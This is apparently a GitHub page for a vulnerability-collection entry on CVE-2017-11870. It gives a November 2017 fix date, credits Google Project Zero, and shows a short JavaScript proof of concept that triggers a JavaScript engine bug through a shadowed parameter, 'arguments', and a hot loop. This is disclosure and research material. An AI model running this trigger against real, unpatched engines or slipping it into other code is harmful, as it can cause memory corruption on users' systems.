Skip to content

Latest commit

 

History

History
26 lines (19 loc) · 521 Bytes

CVE-2017-11870.md

File metadata and controls

26 lines (19 loc) · 521 Bytes

CVE-2017-11870

  • Fix: Nov 2017
  • Credit: lokihardt of Google Project Zero

PoC

function f(x) {
    arguments;

    {
        function x() {
        }
    }
}

for (let i = 0; i < 10000; i++)
    f();

Reference